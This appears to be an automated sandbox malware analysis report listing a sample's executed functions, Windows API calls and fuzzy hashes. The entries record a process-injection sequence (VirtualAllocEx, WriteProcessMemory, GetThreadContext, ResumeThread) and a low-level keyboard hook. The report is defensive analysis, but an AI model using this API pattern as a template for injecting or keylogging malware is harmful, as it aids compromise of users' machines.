Instruction ID: d9cf2e6359c685bd473d502202e6b4895dc4329063b43ddff0a317e0cbb5077c
Opcode Fuzzy Hash: b6afb8cd195ccc8b61f2321c1fab706b35d5df9bdf1a2e94bd1106b7a7e52486
Instruction Fuzzy Hash: 4C5100B1C04348DFDB12CFA9C884ADDBFB1BF49314F24856AE819AB251D7B59885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 058E0040, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 058E0152

Memory Dump Source

Source File: 0000000E.00000002.342919343.00000000058E0000.00000040.00000001.sdmp, Offset: 058E0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 27da185fcfb1fbb176916cba909894b6d6833d7e2820d738c75508d68dade278
Instruction ID: 30d3a5da203b772b825a4222fc60c1f97bec750034a91a0e77f1428c28b79063
Opcode Fuzzy Hash: 27da185fcfb1fbb176916cba909894b6d6833d7e2820d738c75508d68dade278
Instruction Fuzzy Hash: A741CEB1D10309EFDF14CF99C884ADEBBB5BF49314F64852AE819AB210D7B59885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 058E2600, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 058E26C1

Memory Dump Source

Source File: 0000000E.00000002.342919343.00000000058E0000.00000040.00000001.sdmp, Offset: 058E0000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: bf906e7e27a7bc9c2f9b3f2cdf1ace1c597d11c086aa017e0ec5570033a94bba
Instruction ID: 288053ed3f8822a91d01d856bff32620bf571ed8ed6eddc7caece65ffef3efa4
Opcode Fuzzy Hash: bf906e7e27a7bc9c2f9b3f2cdf1ace1c597d11c086aa017e0ec5570033a94bba
Instruction Fuzzy Hash: 3B416DB8900205DFCB10CF99C488BAABBF9FF8A314F158559D819A7320C734A845CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 07438151, Relevance: 1.6, APIs: 1, Instructions: 68injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 074381E5

Memory Dump Source

Source File: 0000000E.00000002.345124452.0000000007430000.00000040.00000001.sdmp, Offset: 07430000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 40080e923960be001331f90b632b34186eb008d5dd55f74b1a68baea1afcc74e
Instruction ID: 2dd2a47cde8c97375dffda5686db7f007fc6498a7606d2aca4a680ce6e315e5e
Opcode Fuzzy Hash: 40080e923960be001331f90b632b34186eb008d5dd55f74b1a68baea1afcc74e
Instruction Fuzzy Hash: CA21F4B59002599FCB10CFAAD884BEEBBF4FB48314F04852AE859A3340D774A554CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 07438158, Relevance: 1.6, APIs: 1, Instructions: 65injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 074381E5

Memory Dump Source

Source File: 0000000E.00000002.345124452.0000000007430000.00000040.00000001.sdmp, Offset: 07430000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 46b5a4a4a5221dd5144bafd908ba57287db1f4d4b138fb65a8182ae9a142fc50
Instruction ID: 69178986202dfb8e02dc1793a7730ac21b8438d1c6376b93b332dbab844f204d
Opcode Fuzzy Hash: 46b5a4a4a5221dd5144bafd908ba57287db1f4d4b138fb65a8182ae9a142fc50
Instruction Fuzzy Hash: 0621E4B59002599FCF10CF9AD885BDEFBF8FB48314F04842AE918A3340D778A954CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 07437FD8, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0743805F

Memory Dump Source

Source File: 0000000E.00000002.345124452.0000000007430000.00000040.00000001.sdmp, Offset: 07430000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 427b5607ea803634204e67ba03b5851a1d74143f1a62a1b860ffb38558a0ceb4
Instruction ID: 369236b23257a8aeca555adc210f8ca315c16f0654b5043e99b23c07aebef7e7
Opcode Fuzzy Hash: 427b5607ea803634204e67ba03b5851a1d74143f1a62a1b860ffb38558a0ceb4
Instruction Fuzzy Hash: 8A21E2B19002599FCB10CF9AD884BDEBBF4FB48324F00842AE958A7210D339A554CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 07437FE0, Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0743805F

Memory Dump Source

Source File: 0000000E.00000002.345124452.0000000007430000.00000040.00000001.sdmp, Offset: 07430000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: bdf6d36da5e9aaa63bb75a00236629e80f0deb28ae840407178f5076a7e1a779
Instruction ID: 71b8dddf4d454755ee1a4b27b71721c689f90cc8d181cd3525b2113c9fb24fcd
Opcode Fuzzy Hash: bdf6d36da5e9aaa63bb75a00236629e80f0deb28ae840407178f5076a7e1a779
Instruction Fuzzy Hash: 8521E2B5900259DFCB10CF9AD884BDEFBF8FB48320F14842AE958A7250D379A554CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07437F18, Relevance: 1.6, APIs: 1, Instructions: 58threadCOMMON

Download Yara Rule

APIs

GetThreadContext.KERNELBASE(?,00000000), ref: 07437F97

Memory Dump Source

Source File: 0000000E.00000002.345124452.0000000007430000.00000040.00000001.sdmp, Offset: 07430000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 8f15cd343ffce459bcddb035457a855c134a19c734394900cc46798045263e07
Instruction ID: c7fa26b9e41687c52f7f19c308c53b6ef24b4e385ab3ffe9efb54dae78d6d161
Opcode Fuzzy Hash: 8f15cd343ffce459bcddb035457a855c134a19c734394900cc46798045263e07
Instruction Fuzzy Hash: 7C214AB5D0021A9FCB10CF99C5857EEFBF4BF48224F44812AD818B3740D378A9558FA1

Uniqueness

Uniqueness Score: -1.00%

Function 07437F20, Relevance: 1.6, APIs: 1, Instructions: 58threadCOMMON

Download Yara Rule

APIs

GetThreadContext.KERNELBASE(?,00000000), ref: 07437F97

Memory Dump Source

Source File: 0000000E.00000002.345124452.0000000007430000.00000040.00000001.sdmp, Offset: 07430000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 268c296138b366225fb60c8bb197b2a1047c86290af706c044eaa5bfd30a7483
Instruction ID: b4fcba963cf4a91def6107176579d9638031aeb7421d65d2081166ca51430ac3
Opcode Fuzzy Hash: 268c296138b366225fb60c8bb197b2a1047c86290af706c044eaa5bfd30a7483
Instruction Fuzzy Hash: 362117B1D0021A9FCB10CF9AC4857EEFBF4BB49224F44812AE418B3340D778A955CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0743B1E4, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,0743BD01,?,?), ref: 0743BEA8

Memory Dump Source

Source File: 0000000E.00000002.345124452.0000000007430000.00000040.00000001.sdmp, Offset: 07430000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: da305687203219119bb82aecf426830568f9a8e9956ea09816288264c0783dac
Instruction ID: b0637fc9be66817d48faa1d2573cbca7deda88240baf630233b522af2385720b
Opcode Fuzzy Hash: da305687203219119bb82aecf426830568f9a8e9956ea09816288264c0783dac
Instruction Fuzzy Hash: 841136B18003099FCB10DF99C449BEEBBF4EB48324F14841AD958A7340D338A949CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 074380A9, Relevance: 1.6, APIs: 1, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0743811B

Memory Dump Source

Source File: 0000000E.00000002.345124452.0000000007430000.00000040.00000001.sdmp, Offset: 07430000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 025d0490fe9c6270a8485fd6cdcabf1c2521b63027681f27173f5520ea51834b
Instruction ID: 4905d868407ac8f1348d066dd238cd35316adc845c4df4e30e93967fe61d0689
Opcode Fuzzy Hash: 025d0490fe9c6270a8485fd6cdcabf1c2521b63027681f27173f5520ea51834b
Instruction Fuzzy Hash: B31113B59002499FCB20CF99D884BDEBBF8FB49324F14841AE528A7210C375A554CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 074380B0, Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0743811B

Memory Dump Source

Source File: 0000000E.00000002.345124452.0000000007430000.00000040.00000001.sdmp, Offset: 07430000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bed41bb7c93c2c270580a933767f40c44fe1f8d0168e51d7d60dee589ab1b78a
Instruction ID: 07ad6cab0be8ac1a796be72714dd05d085018764546767d0ae8a4175d54e2d68
Opcode Fuzzy Hash: bed41bb7c93c2c270580a933767f40c44fe1f8d0168e51d7d60dee589ab1b78a
Instruction Fuzzy Hash: F111F5B59002499FCF10DF9AD884BDEFBF8FB49324F148419E528A7210C375A554CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07438229, Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0743828F

Memory Dump Source

Source File: 0000000E.00000002.345124452.0000000007430000.00000040.00000001.sdmp, Offset: 07430000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: ccf79f5406d5974faecfdea4bcc69331fac804cf6bffee37c541bcfe0f014c66
Instruction ID: f5b00128dfa1ef380876d1eef87a23aa3bad8c3aca02d7355490d61bee0daac1
Opcode Fuzzy Hash: ccf79f5406d5974faecfdea4bcc69331fac804cf6bffee37c541bcfe0f014c66
Instruction Fuzzy Hash: 881112B59002098FCB10DF99D589BEEFBF8AB48324F14881AD558B3300C379A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07439548, Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 074395AD

Memory Dump Source

Source File: 0000000E.00000002.345124452.0000000007430000.00000040.00000001.sdmp, Offset: 07430000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 2a5ef96a468fd2861f7af48d09efc12042ae023ce60965f5ae0d9e82ed94754c
Instruction ID: db3b10a094227c203d1bd099bda727c57ca4c3143658efa036192750e2ac8806
Opcode Fuzzy Hash: 2a5ef96a468fd2861f7af48d09efc12042ae023ce60965f5ae0d9e82ed94754c
Instruction Fuzzy Hash: 5B1106B69003498FDB10DF99D485BEEBBF4EB49324F14841AD858A7200C375A544CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 058E0280, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 058E02E5

Memory Dump Source

Source File: 0000000E.00000002.342919343.00000000058E0000.00000040.00000001.sdmp, Offset: 058E0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 1fc9a0b793a1862e46a9b37214102060431fc9d23e3e5154fadd7d967f5da9b2
Instruction ID: 9ca2aa87a04e1483c8929fbc12b5974da96054d0a8b90efb1a77863b47158a93
Opcode Fuzzy Hash: 1fc9a0b793a1862e46a9b37214102060431fc9d23e3e5154fadd7d967f5da9b2
Instruction Fuzzy Hash: 7011E0B5900209CFDB10CF99D588BDEBBF8FB48224F14890AD959A3700C375A955CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 058E0288, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 058E02E5

Memory Dump Source

Source File: 0000000E.00000002.342919343.00000000058E0000.00000040.00000001.sdmp, Offset: 058E0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: aef16c179215c339d036b8c5a53747dc77dd6e761d6ed5f1eb0b819e0768fb25
Instruction ID: 4d20677958d05c782f1b908a5fa2619df20333bbd930e16418cb6de0ce67818a
Opcode Fuzzy Hash: aef16c179215c339d036b8c5a53747dc77dd6e761d6ed5f1eb0b819e0768fb25
Instruction Fuzzy Hash: 921100B5800209CFDB20CF99D488BDEBBF8FB49324F14881AD959A3700C375A948CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07439550, Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 074395AD

Memory Dump Source

Source File: 0000000E.00000002.345124452.0000000007430000.00000040.00000001.sdmp, Offset: 07430000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: d65d7ee62c27541e4f8038a6001d44903c5239edebbd767ef95ee00fe8cf3598
Instruction ID: 2371b1d9ecc58803a358c374d6e8ca3ff87bd5f20eda157c232a92d78135cf41
Opcode Fuzzy Hash: d65d7ee62c27541e4f8038a6001d44903c5239edebbd767ef95ee00fe8cf3598
Instruction Fuzzy Hash: C911E5B58003499FDB10DF99D484BDEBBF8FB59324F14841AD958A7300C375A594CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07438230, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0743828F

Memory Dump Source

Source File: 0000000E.00000002.345124452.0000000007430000.00000040.00000001.sdmp, Offset: 07430000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d7e6ab2a1a47a37910530eed6954258e52ffcfbfcd720485aa789586c407f0c1
Instruction ID: f1f40d502a922a0048481ed6921e8f42e3760d1cc027f9a5cf7adc45e24c949a
Opcode Fuzzy Hash: d7e6ab2a1a47a37910530eed6954258e52ffcfbfcd720485aa789586c407f0c1
Instruction Fuzzy Hash: 9F1123B18002098FCB20DF9AD488BDEFBF8EB49324F14841AD518B3300C779A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0163D1FC, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.333313585.000000000163D000.00000040.00000001.sdmp, Offset: 0163D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49cc77acdf7a746fa1e9961f98b00fdcc4fac0db02667d2562c9e38c2b0c5e81
Instruction ID: 464cd9445b05125cc46aacf132e979efeb3be22a6b1b0024062c404e69bc062d
Opcode Fuzzy Hash: 49cc77acdf7a746fa1e9961f98b00fdcc4fac0db02667d2562c9e38c2b0c5e81
Instruction Fuzzy Hash: FA21D3B2504240DFDB06CF94DDC4B2ABB65FBC8324F64C5A9EE054B246C336D856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0163D4C4, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.333313585.000000000163D000.00000040.00000001.sdmp, Offset: 0163D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29bdf4ebe35b009a1b911af34d0386ea7603e1427824897b7ea3593577fd497b
Instruction ID: cd86e36f64b957e1913a288d583ad87acee268db272af5afc90d7a862a5fe31c
Opcode Fuzzy Hash: 29bdf4ebe35b009a1b911af34d0386ea7603e1427824897b7ea3593577fd497b
Instruction Fuzzy Hash: 6C21D3B2504240EFDB06DF54DDC0B2ABF65FBC8328F648569E9054B247C336D856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0164D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.333343460.000000000164D000.00000040.00000001.sdmp, Offset: 0164D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d90843f2b589208e0d9ba21a92f8124de8bea4e48c3cb9361c3e8bca1b7ea861
Instruction ID: 5900fac42e53a303f0b743fa7b646fc877b7adee952ddc299a15393725404b1a
Opcode Fuzzy Hash: d90843f2b589208e0d9ba21a92f8124de8bea4e48c3cb9361c3e8bca1b7ea861
Instruction Fuzzy Hash: E22122B1908240DFCB15CF94D8C4B26BB61FB94B54F24C9ADE90A4B346C33AD847CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0163D1F7, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.333313585.000000000163D000.00000040.00000001.sdmp, Offset: 0163D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2275d29c36d439e7e0dc468a0bcb37c7e7cff93233feb68aa4f432f177d54f04
Instruction ID: 2446314b1097288445970ed070b59827acd245c30df26c2994bf45e540455d9e
Opcode Fuzzy Hash: 2275d29c36d439e7e0dc468a0bcb37c7e7cff93233feb68aa4f432f177d54f04
Instruction Fuzzy Hash: 40219D76404280DFDB06CF54D9C4B56BF71FB84320F28C6A9DD050B656C33AD46ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0163D4BF, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.333313585.000000000163D000.00000040.00000001.sdmp, Offset: 0163D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7515d1e00a04a0e55848f7cd81b3790f4b61e24b1716d03f054666e0b267afed
Instruction ID: c79a0e34f3bf280f65a8118554be52e92d1a98a315b95a0354f2190e6db3ceed
Opcode Fuzzy Hash: 7515d1e00a04a0e55848f7cd81b3790f4b61e24b1716d03f054666e0b267afed
Instruction Fuzzy Hash: 2111B176504280DFCB12CF54D9C4B16BF71FB84324F28C6A9D8450B656C336D45ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0164D017, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.333343460.000000000164D000.00000040.00000001.sdmp, Offset: 0164D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1a628c3933e47b177a8a01db77fcc635cfd832c17444b70101262a320bc7792
Instruction ID: 2c6640289f2dd51d4ef3770a0ae2959d6cbcd4ac8a94599496bdfd37b5682a71
Opcode Fuzzy Hash: c1a628c3933e47b177a8a01db77fcc635cfd832c17444b70101262a320bc7792
Instruction Fuzzy Hash: FA11BE75904280CFCB12CF54D9C4B15BB61FB45714F28C6AAD8094B756C33AD44ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 0163D731, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.333313585.000000000163D000.00000040.00000001.sdmp, Offset: 0163D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 784e5b02ec69d1c1971f1d0acb80c75e24b317cbd47c4e4cbada05e230e71a7c
Instruction ID: d7059c507c1058c728618efcc5a1c77eb173fefe1c5ee7c440087143df644bcc
Opcode Fuzzy Hash: 784e5b02ec69d1c1971f1d0acb80c75e24b317cbd47c4e4cbada05e230e71a7c
Instruction Fuzzy Hash: D001F7714083849AE7124A69CC84776BBE8EF81264F488459EE045B242D3789845C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 0163D730, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.333313585.000000000163D000.00000040.00000001.sdmp, Offset: 0163D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71507c8f18409dac85b37f8736de16ea14b5a441b559a49b0ea0dd8f7c3bb361
Instruction ID: 88be0491e9da1aa83a12d1e0b0aa1e188c69320c29691d3779c9d56b611448f7
Opcode Fuzzy Hash: 71507c8f18409dac85b37f8736de16ea14b5a441b559a49b0ea0dd8f7c3bb361
Instruction Fuzzy Hash: A3F062714042849EEB218E19DD84B76FFE8EB85734F18C55AED085B386C3799844CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: kprUEGC.exe PID: 6276 Parent PID: 5548 kprUEGC.exeCOMMON

Executed Functions

Function 010DC928, Relevance: 1.9, APIs: 1, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.621906663.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6621842547692dd36e76b72f627fff7454c490c8ca552d13fa48986ef027551d
Instruction ID: a758411da669735e813d8bc6adb8f0c38a958ab21523c56f3af84fe06da785dd
Opcode Fuzzy Hash: 6621842547692dd36e76b72f627fff7454c490c8ca552d13fa48986ef027551d
Instruction Fuzzy Hash: FEF14B70A00309CFEB15DFA9C988B9DBBF1BF88314F1585A9E545AF2A5DB70E845CB40

Uniqueness

Uniqueness Score: -1.00%

Function 01596B50, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 01596BB0
GetCurrentThread.KERNEL32 ref: 01596BED
GetCurrentProcess.KERNEL32 ref: 01596C2A
GetCurrentThreadId.KERNEL32 ref: 01596C83

Memory Dump Source

Source File: 00000013.00000002.623487224.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 08a993f4543a64293b0be3e1ba472f529c4f485126d0118076ee66cdc4c5ef7d
Instruction ID: c3df8f49b56bda77f05592d9d37089e791687502760cd38473405cb706063ced
Opcode Fuzzy Hash: 08a993f4543a64293b0be3e1ba472f529c4f485126d0118076ee66cdc4c5ef7d
Instruction Fuzzy Hash: AD5123B0D002498FDB14CFAAD648BEEBBF1FB49314F248459E519A7350D734A888CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0167EBD8, Relevance: 1.6, APIs: 1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.623923971.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63b419ab7e432209c5d0c75aa1e6e017d7c1b9ea55b441c8a649a83514275896
Instruction ID: dcd20c4a0b38427daedbd66e3b229e6a3bfcd919366e0ee3cc5958187beefbb0
Opcode Fuzzy Hash: 63b419ab7e432209c5d0c75aa1e6e017d7c1b9ea55b441c8a649a83514275896
Instruction Fuzzy Hash: DB412272D083598FCB04DFB9C8046EEBBF1AF89214F0585AED514A7240DB789845CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 01595184, Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 015952A2

Memory Dump Source

Source File: 00000013.00000002.623487224.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 582bc269b7b7d1676f435597834dfdb38fce366aaca77a71f6f5cb8f4f07c54f
Instruction ID: a8124edb064e570bd9e874f7499aec263f5377ea505cf15acb519a75c9ddae04
Opcode Fuzzy Hash: 582bc269b7b7d1676f435597834dfdb38fce366aaca77a71f6f5cb8f4f07c54f
Instruction Fuzzy Hash: 5B5101B1C103099FDF15CFA9C884ADEBFB1BF88310F24852AE818AB210D7749845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01595190, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 015952A2

Memory Dump Source

Source File: 00000013.00000002.623487224.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 0afe75aa1840490cd0cefb2925b966422a71fb30f9625b546588bbeca991f599
Instruction ID: 3efb6c4fac8ec658196cd6c528dc5e975ebe34911186986cc96cf7f27e76b8ab
Opcode Fuzzy Hash: 0afe75aa1840490cd0cefb2925b966422a71fb30f9625b546588bbeca991f599
Instruction Fuzzy Hash: 5C41E0B1D10309DFDF15CFA9C884ADEBBB5BF88314F24852AE819AB210D774A845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01596964, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 01597D01

Memory Dump Source

Source File: 00000013.00000002.623487224.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 746df4cd7084702712939b9218cfcb96ad8c95ea7f41a610b440df71ac861b1c
Instruction ID: 776d80adc695d8906558f327c3e3710649774baf78636b44eef344357ca21ded
Opcode Fuzzy Hash: 746df4cd7084702712939b9218cfcb96ad8c95ea7f41a610b440df71ac861b1c
Instruction Fuzzy Hash: 534138B5A103498FDB05CF99C448BAABBF5FF88314F188859D519AB321D734A841CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0159C3C9, Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 0159C452

Memory Dump Source

Source File: 00000013.00000002.623487224.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 6e3fad1694cc26ded9ff7ffbaa4a255c55b1cd5e0d13b2b3ab978d8d592537cc
Instruction ID: 16d60b43175741d20e7c412349e6589f76672b232661ca98a9a5d73965d6dfc5
Opcode Fuzzy Hash: 6e3fad1694cc26ded9ff7ffbaa4a255c55b1cd5e0d13b2b3ab978d8d592537cc
Instruction Fuzzy Hash: 103134B08043858FDF10DF69D4043EE7FF4BB46314F28845AE449AB202C77A1445CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 01596D71, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01596DFF

Memory Dump Source

Source File: 00000013.00000002.623487224.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b7aee508825c8c68e1fe0f12c56940f4f3ab1b62bc9f4939f200f30871d3fe9e
Instruction ID: 9676c8d36e51a0f9d328ba8d36b3434621f5eb25599602a48612d263618879e2
Opcode Fuzzy Hash: b7aee508825c8c68e1fe0f12c56940f4f3ab1b62bc9f4939f200f30871d3fe9e
Instruction Fuzzy Hash: BB21E0B59002499FDB10CFA9D884AEEBBF4FB48324F14841AE914A7310D378A955DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01596D78, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01596DFF

Memory Dump Source

Source File: 00000013.00000002.623487224.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c12f16fcfac4d3c192c6f0ba7d0023920c3f73d1867245eceae329c1fbe34fa4
Instruction ID: ede95ebb1977402c03d4226f11dae93ae726e0970faa65855540765e3d095d3d
Opcode Fuzzy Hash: c12f16fcfac4d3c192c6f0ba7d0023920c3f73d1867245eceae329c1fbe34fa4
Instruction Fuzzy Hash: 5721C4B59002499FDB10CFA9D984ADEBBF4FB48324F14841AE914A7310D378A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0167EC68, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0167EC2A), ref: 0167ED17

Memory Dump Source

Source File: 00000013.00000002.623923971.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: e56a5d8c8c22caed7b583b905cce418912b6a0df240bba418086100e2432bbf7
Instruction ID: f83d6dd89f9dfaa32c3cbf0e5d48779f25a1742a3534ce0032935c2d424675d5
Opcode Fuzzy Hash: e56a5d8c8c22caed7b583b905cce418912b6a0df240bba418086100e2432bbf7
Instruction Fuzzy Hash: C91108B5C092598FDF10CFA8D8103EDBBF0EF59328F1641DAD554A7291D3399849CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0167FCE0, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 0167FD63

Memory Dump Source

Source File: 00000013.00000002.623923971.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 592b20b2e9bce090a8494eaf5c91305bdd05d92cda00ee56f4b68b85e8cd3ac6
Instruction ID: c55dcfdbc8c7a979bd5a53ac1cd43b6622ca3522e1b88835ada4e95ac52f7a70
Opcode Fuzzy Hash: 592b20b2e9bce090a8494eaf5c91305bdd05d92cda00ee56f4b68b85e8cd3ac6
